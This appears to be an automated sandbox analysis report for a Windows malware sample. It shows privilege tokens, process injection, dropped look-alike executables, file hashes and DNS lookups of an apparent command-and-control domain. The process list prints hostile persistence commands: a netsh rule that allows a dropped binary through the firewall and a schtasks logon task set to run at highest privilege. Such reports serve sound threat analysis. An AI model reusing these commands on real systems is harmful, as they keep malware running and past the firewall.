Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\excelsl.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1532 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe
PID 1532 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe
PID 1532 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe
PID 1532 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe
PID 1532 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe
PID 1532 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe
PID 1532 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe
PID 1532 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe
PID 1532 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe
PID 1532 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe
PID 1532 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe
PID 1532 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe
PID 1532 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe
PID 1532 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe
PID 1532 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe
PID 1532 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe
PID 1532 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe
PID 1532 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe
PID 1532 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 1532 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 1532 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1532 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1140 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4460 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 1116 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1116 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1116 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe
PID 3016 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe

"C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe"

C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe

"C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe"

C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe

"C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe"

C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe

"C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe"

C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe

"C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe"

C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe

"C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe"

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

"C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe"

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

"C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1532 -ip 1532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 1628

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

"C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4460 -ip 4460

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe" 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 1128

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3016 -ip 3016

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1128

C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe

"C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4448 -ip 4448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 1160

C:\Users\Admin\Documents\excelsl.exe

"C:\Users\Admin\Documents\excelsl.exe"

C:\Windows\svehosts.exe

"C:\Windows\svehosts.exe"

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2296 -ip 2296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 1172

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\svehosts.exe" "svehosts.exe" ENABLE

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'prndrvest"' /tr "'C:\Users\Admin\AppData\Roaming\prndrvest.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp50EA.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\prndrvest.exe

"C:\Users\Admin\AppData\Roaming\prndrvest.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/1532-0-0x0000000075372000-0x0000000075373000-memory.dmp

memory/1532-1-0x0000000075370000-0x0000000075921000-memory.dmp

memory/1532-2-0x0000000075370000-0x0000000075921000-memory.dmp

memory/1532-3-0x0000000075372000-0x0000000075373000-memory.dmp

memory/1532-4-0x0000000075370000-0x0000000075921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe

MD5 2819e45588024ba76f248a39d3e232ba
SHA1 08a797b87ecfbee682ce14d872177dae1a5a46a2
SHA256 b82b23059e398b39f183ec833d498200029033b0fd3a138b6c2064a6fa3c4b93
SHA512 a38b58768daf58fa56ca7b8c37826d57e9dbfcd2dedf120a5b7b9aa36c4e10f64ec07c11dbd77b5861236c005fe5d453523911906dd77a302634408f1d78503a

memory/2232-33-0x0000000075370000-0x0000000075921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe

MD5 3e804917c454ca31c1cbd602682542b7
SHA1 1df3e81b9d879e21af299f5478051b98f3cb7739
SHA256 f9f7b6f7b8c5068f9e29a5b50afca609018c50ffd61929e1b78124f5381868f1
SHA512 28e59bc545179c2503771b93d947930bd56f8ebd0402ecbb398335c5ac89f40051e93fbfd84d35b8c625b253bb4cafea6a5360914b8d54d1bc121977f1eadbaf

C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe

MD5 e87459f61fd1f017d4bd6b0a1a1fc86a
SHA1 30838d010aad8c9f3fd0fc302e71b4cbe6f138c0
SHA256 ec1b56551036963a425f6a0564d75980054e01d251c88eb29c81c1b2182f5727
SHA512 dd13993174d234d60ec98124b71bfefcf556c069e482a2e1f127f81f6738b71cd37cee95bf0119d3a61513c01438055767d480e26d6ed260ee16a96533d0cfa2

memory/5060-80-0x0000000000B40000-0x0000000000BA4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

MD5 9d2a888ca79e1ff3820882ea1d88d574
SHA1 112c38d80bf2c0d48256249bbabe906b834b1f66
SHA256 8b5b38085f12d51393ed5a481a554074d3c482d53ecd917f2f5dffdf3d2ee138
SHA512 17a9f74ecf9f118ed0252fa0bc6ce0f9758a4dc75f238cae304def9c37cd94623818dd4aef38826642ff9e549b7e6047318f8bf6de7edff2d61a298d0bf5c840

memory/3628-82-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/5060-84-0x0000000005400000-0x0000000005492000-memory.dmp

memory/5060-81-0x0000000005A90000-0x0000000006034000-memory.dmp

memory/5060-85-0x00000000054E0000-0x00000000054EA000-memory.dmp

memory/3016-73-0x0000000075370000-0x0000000075921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe

MD5 f07d2c33e4afe36ec6f6f14f9a56e84a
SHA1 3ebed0c1a265d1e17ce038dfaf1029387f0b53ee
SHA256 309385e6cd68c0dd148905c3147f77383edaf35da9609c0717da7df1a894e3ca
SHA512 b4fbf0e6b8e7e8e1679680039e4ac0aebdf7967a9cc36d9ddac35fa31d997253384a51656d886afb2ded9f911b7b8b44c2dcb8ebe71962e551c5025a4d75ebe2

memory/1140-70-0x0000000075370000-0x0000000075921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe

MD5 590acb5fa6b5c3001ebce3d67242aac4
SHA1 5df39906dc4e60f01b95783fc55af6128402d611
SHA256 7bf9b7b25cf1671e5640f8eeac149f9a4e8c9f6c63415f4bd61bccb10ddf8509
SHA512 4ac518140ee666491132525853f2843357d622fe351e59cca7ce3b054d665f77ad8987adddd601e6b1afe6903222d77cf3c41a5aa69e8caf0dcdc7656a43e9ba

memory/1140-66-0x0000000075370000-0x0000000075921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe

MD5 9133c2a5ebf3e25aceae5a001ca6f279
SHA1 319f911282f3cded94de3730fa0abd5dec8f14be
SHA256 7c3615c405f7a11f1c217b9ecd1000cf60a37bca7da1f2d12da21cc110b16b4d
SHA512 1d1af3fcfcdba41874e3eb3e2571d25798acfd49b63b7fcf9393be2f59c9ba77e563da1717abcd6445fc52fd6d948bf4c0dd5978a192c8e32e0a9279fd0be33e

memory/2232-34-0x0000000075370000-0x0000000075921000-memory.dmp

memory/1532-87-0x0000000075370000-0x0000000075921000-memory.dmp

memory/5060-88-0x0000000009620000-0x0000000009644000-memory.dmp

memory/1116-98-0x0000000000400000-0x00000000004C2000-memory.dmp

